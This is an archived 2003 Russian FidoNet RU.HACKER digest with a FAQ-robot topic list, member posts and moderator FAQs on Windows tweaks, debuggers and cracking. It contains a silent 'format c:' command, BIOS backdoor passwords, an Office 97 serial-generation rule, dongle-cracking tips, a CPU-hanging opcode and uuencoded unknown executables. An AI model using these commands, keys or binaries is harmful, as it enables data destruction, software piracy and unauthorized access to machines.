e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5517 [1-10330] From : Sergey Borovykh 22-May-03 01:42:42 2:5030/1389 To : All Subj : psybnc =====================================================================RU.HACKER= Hi All! Кто знает как расшифровать пароль от сабжа из psybnc.conf? Выслушаю любые предложения и советы... Подскажите плз. урлы, или ещё что-нить... ---- USER1.USER.PASS==1305'h`P`g'I1E'K0u ---- ... E-MAIL : *_KISLON@NWGSM.RU_* (160 символов) --- /Life is look like a mail, sometimes we don't get it.../ (c)... * Origin: *NO_FATE_BOARD* (2:5030/1389) = Здесь обитают хакеры ====================================================New= Msg : 5518 [1-10330] From : Denis Ivanov 22-May-03 00:52:20 2:5020/1007.8 To : Vladimir Puzanov 2:463/626.7 Subj : Помогите взломать вот эту программу Help!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! =====================================================================RU.HACKER= Доброго здоровья тебе Vladimir! Специальный корреспондент, Vladimir Puzanov вошел в контакт с Denis Ivanov в Sunday April 27 2003 23:11, и не выходя из контакта выяснил следующее DI>> она не большая весит 3Кb мне нужно узнать, что она делает и какой DI>> механизм расширасшифровки.Можно ее сюда закинуть? VP> VP> Черный ящик что-ли? VP> Всего хорошего. Vladimir. ЧТО-то именно того. source file name : XXCC.COM original size : 2822 (3Kb) created on : 06-Nov-00 23:22:34 encoded on : 11-Apr-03 08:10:18 approximate encoded size : 5Kb number of sections : 1 lines per section : 63 section 1 of file xxcc.com < UUE by DN OSP 1.51.12/DPMI > filetime 694598353 begin 644 xxcc.com M35K"``8``@`@````__\`````````````/@````$`^S!J<@`````````````` M```````````````````````!````#@`````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M``````````````````````"[3`"0^H[3O``$^QY0N!$`CMBT";H``,TANBP` MM`K-(8O:@'\!"'5\NO8`N``]S2%S)KHV`+0)S2&Z=@"T"LTANW8`0XL_@>?_ M`,9!`0"#P@*X`#W-(7),B]BX`$(SR8L6@`'-(>@]`+1BS2&.PXS0*\,%``2+ MV+1*S2&Z=0$>![N"`\<'``#'1P*(`XQ?!+@`2\TA

T";J*`\TANG4!M$'- M(L,D.@2 M`+1`S2&'\^O51=75X=$49>0UU5$!%E65!?6A%(7D01 @15X165`9=V01"AP8&%):6%]6$5Q($4%#7E9#4%P0$14` ` end sum -r/size 10293/3915 section (from "begin" to "end") sum -r/size 57006/2822 entire input file === Cut === Как жаль,что Вы Vladimir Puzanov наконец-то уходите.... [Team Король и Шут] [I  Дядю Степу] [Windows 98 RULES!] --- * Origin: Хочу познакомиться с девушками от 5-85 лет. (2:5020/1007.8@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 5519 [1-10330] K/s From : Vasya Kruglov 23-May-03 02:57:00 2:5020/1587.444 To : All Subj : Матрица-2 =====================================================================RU.HACKER= ╔════════════════════════════════════════════════════──────────────────────── ║ Отфорвардил Vasya Kruglov (2:5020/1587.444) ║ Конф.: ETERNAL.TALK (ETERNAL.TALK) ║ От : Vasya Kruglov, 2:5020/1587.444@FidoNet (Пят Май 23 2003 02:56) ║ Кому : All ║ Тема : Матрица-2 ╚═══════════════════════════════════════════════════════════════════───────── Привет тебе, матерый человечище All! Сегодня (уже вчера) посмотрел сабж. Рекомендую. Да, там есть момент, когда Тринити хакает некий комп. В отличие от многих фильмов, здесь взлом очень похож на настоящий - используется эксплоит некой дыры в ssh. Почему "похож"? Да потому, что за пару секунд просто не сообразишь, какой именно эксплоит применять (против ssh, samba или еще кого), потому, что на серьезных объектах так халатно относиться к безопасности и не ставить патчи просто не могут, и, наконец, откуда она на той машине эксплоит взяла? :-) Дискеток я не заметил :- P.S. При взломе используется nmap. С сайта insecure.org: (там и кадры из фильма есть) === cut === We have all seen many movies like Hackers which pass off ridiculous 3D animated eye-candy scenes as hacking. So I was shocked to find that Trinity does it properly in The Matrix Reloaded. She whips out Nmap version 2.54BETA25, uses it to find a vulnerable SSH server, and then proceeds to exploit it using the SSH1 CRC32 exploit from 2001. Shame on them for being vulnerable (timing notes). Congratulations to everyone who has helped make Nmap successful! And thanks to Jason Algol, Titney, Thorsten Delbrouck, and others for sending pics! Click them for higher-res or see more pics here In addition, Dave from Lab6 notifies me that Nmap source code is displayed in Battle Royale: [Screen1] [Screen2] [Trivia === cut === Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru -+- GoldED+/386 1.1.1.2 + Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) ============================================================================= Привет тебе, матерый человечище All! Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5520 [1-10330] From : Minaev Sergei 23-May-03 00:22:46 2:5020/178.142 To : All Subj : =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_All_* Есть ли какой-нибудь эксплоит для squid/2.5.PRE13? /_Hу все вроде бы я сказал_/ *_All_* *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 5521 [1-10330] K/s From : Moderator's Post 24-May-03 01:19:55 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5522 [1-10330] K/s From : Moderator's Post 24-May-03 01:19:59 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5523 [1-10330] K/s From : Moderator's Post 24-May-03 01:19:59 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp 